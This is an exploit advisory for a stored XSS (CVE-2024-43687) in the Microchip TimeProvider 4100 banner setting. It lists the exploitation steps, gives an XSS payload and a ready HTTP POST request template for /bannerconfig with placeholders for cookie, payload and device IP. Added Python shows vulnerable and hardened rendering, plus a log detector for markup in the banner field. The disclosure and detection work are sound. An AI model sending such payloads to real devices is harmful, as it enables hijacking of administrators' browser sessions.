## https://sploitus.com/exploit?id=PACKETSTORM:190258
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (banner) - Stored XSS
# Exploit Author: Armando Huesca Prida
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 10/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-43687
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-43687
# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
# URL: https://www.gruppotim.it/it/footer/red-team.html

# Vulnerability Description:

The TimeProvider 4100 grandmaster firmware contains a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor who exploits this vulnerability can execute arbitrary script in the browser of any user who loads the web management interface, in that user's context.

# Exploitation Steps:

1- Log in to the device's web management interface.
2- Open the banner configuration panel.
3- Select the "custom banner" feature.
4- Insert the malicious JavaScript payload.
5- Apply and save the system configuration containing the custom banner.
6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.

# Example of malicious JavaScript payload:

<img src=a onerror=alert(1)>

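The payload above is stored by the device and later rendered into the management page. As an added defensive example that is not part of the original advisory and not the vendor's code, the following Python shows the two rendering patterns side by side: the vulnerable one, which interpolates the stored banner into the page verbatim, and the hardened one, which HTML-encodes the value at output time. It also shows an input-side check that treats the banner as plain text and refuses markup before it is stored. The function names, the length limit and the sample banner strings are this example's own assumptions.

```python
import html
import re

# Constructed sample inputs: the payload shape shown in the advisory and a benign banner.
PAYLOAD_BANNER = "<img src=a onerror=alert(1)>"
BENIGN_BANNER = "Authorized access only. Activity may be monitored."

# Assumed policy for the example: a banner is printable ASCII plus line breaks, bounded in length.
MAX_BANNER_LEN = 1024
_PLAIN_TEXT = re.compile(r"[\x20-\x7E\r\n]*")


def render_banner_vulnerable(banner: str) -> str:
    """Vulnerable pattern: the stored banner is interpolated into the page verbatim,
    so any markup it carries is parsed and executed by the browser (stored XSS)."""
    return f'<div class="banner">{banner}</div>'


def render_banner_hardened(banner: str) -> str:
    """Hardened pattern: HTML-encode the stored value at output time. Even a banner
    that slipped past validation is displayed as text, never parsed as markup."""
    return f'<div class="banner">{html.escape(banner, quote=True)}</div>'


def validate_banner(banner: str) -> tuple[bool, str]:
    """Input-side check for a plain-text field: bound the length, accept only printable
    ASCII plus line breaks, and refuse angle brackets outright so the stored
    configuration can never contain a tag. Returns (accepted, reason)."""
    if len(banner) > MAX_BANNER_LEN:
        return False, "banner too long"
    if _PLAIN_TEXT.fullmatch(banner) is None:
        return False, "non-printable or non-ASCII characters"
    if "<" in banner or ">" in banner:
        return False, "angle brackets are not allowed in a banner"
    return True, "ok"


if __name__ == "__main__":
    for banner in (BENIGN_BANNER, PAYLOAD_BANNER):
        print("validate :", validate_banner(banner))
        print("vulnerable:", render_banner_vulnerable(banner))
        print("hardened  :", render_banner_hardened(banner))
        print()
```

Output encoding at render time is the fix that closes the bug; the validation step is defence in depth for a field whose legitimate content is never markup, and it also keeps a malicious value out of the saved configuration that the advisory's step 5 writes to the device.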
# Proof of Concept - PoC:

By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS. The placeholders that must be replaced in the exploit HTTP request are listed below:

- [session cookie]
- [malicious JavaScript payload]
- [device IP]

# Exploit - HTTP Request:

POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive

-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"

1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"

[malicious JavaScript payload]

-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"

applybanner
-----------------------------9680247575877256312575038502--
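The request above is also the artifact a defender can look for in a reverse proxy or web-server log that retains POST bodies for the management interface. As an added example that is not part of the original advisory, the following Python parses a multipart/form-data body in the shape of that request, extracts the `txtcustom` field, and flags a banner submission whose text carries HTML markup, an event-handler attribute or a javascript: URL. The body is constructed here from the advisory's field names, boundary and example payload; the parser, the function names and the indicator patterns are this example's own.

```python
import re

# Boundary string from the advisory's request; the body is constructed below for the example.
BOUNDARY = "---------------------------9680247575877256312575038502"

# Field names as they appear in the advisory's request, in submission order.
FORM_FIELDS = ("user_level", "bannerradio", "txtcustom", "action")


def build_sample_body(banner: str, boundary: str = BOUNDARY) -> bytes:
    """Construct a multipart/form-data body in the shape of the advisory's request,
    with CRLF line endings as a browser sends them (constructed sample input)."""
    values = {"user_level": "1", "bannerradio": "CUSTOMIZED",
              "txtcustom": banner, "action": "applybanner"}
    lines = []
    for name in FORM_FIELDS:
        lines += [f"--{boundary}", f'Content-Disposition: form-data; name="{name}"', "", values[name]]
    lines.append(f"--{boundary}--")
    return ("\r\n".join(lines) + "\r\n").encode("utf-8")


def parse_multipart(body: bytes, boundary: str) -> dict[str, str]:
    """Minimal multipart/form-data parser for simple text fields (no file parts,
    no nested multipart). Returns {field name: value}."""
    delimiter = f"--{boundary}".encode("ascii")
    fields: dict[str, str] = {}
    for chunk in body.split(delimiter)[1:]:      # [0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):              # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):            # CRLF that terminates the delimiter line
            chunk = chunk[2:]
        headers, _, value = chunk.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', headers)
        if match is None:
            continue
        if value.endswith(b"\r\n"):              # CRLF before the next delimiter is framing, not data
            value = value[:-2]
        fields[match.group(1).decode("ascii", "replace")] = value.decode("utf-8", "replace")
    return fields


# Indicators that a "plain text" banner actually carries markup (this example's own pattern set).
MARKUP_INDICATORS = (
    (re.compile(r"<\s*/?[A-Za-z!]"), "html_tag"),
    (re.compile(r"\bon[A-Za-z]+\s*=", re.IGNORECASE), "event_handler_attribute"),
    (re.compile(r"javascript\s*:", re.IGNORECASE), "javascript_url"),
)


def audit_banner_request(body: bytes, boundary: str = BOUNDARY) -> tuple[dict[str, str], list[str]]:
    """Parse a POST /bannerconfig body and return (fields, findings). Findings are non-empty
    only when a customized banner is being applied and its text looks like markup."""
    fields = parse_multipart(body, boundary)
    findings: list[str] = []
    applying_custom = (fields.get("bannerradio") == "CUSTOMIZED"
                       and fields.get("action") == "applybanner")
    if applying_custom:
        banner = fields.get("txtcustom", "")
        findings = [label for pattern, label in MARKUP_INDICATORS if pattern.search(banner)]
    return fields, findings


if __name__ == "__main__":
    for banner in ("Authorized access only.", "<img src=a onerror=alert(1)>"):
        fields, findings = audit_banner_request(build_sample_body(banner))
        print(f"txtcustom={fields['txtcustom']!r} findings={findings}")
```

The check is deliberately scoped to the `bannerradio=CUSTOMIZED` plus `action=applybanner` combination so that switching back to a default banner does not raise an alert, and any hit on a production device is worth correlating with the `ci_session` value in the same request to identify which administrator account submitted it.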

# End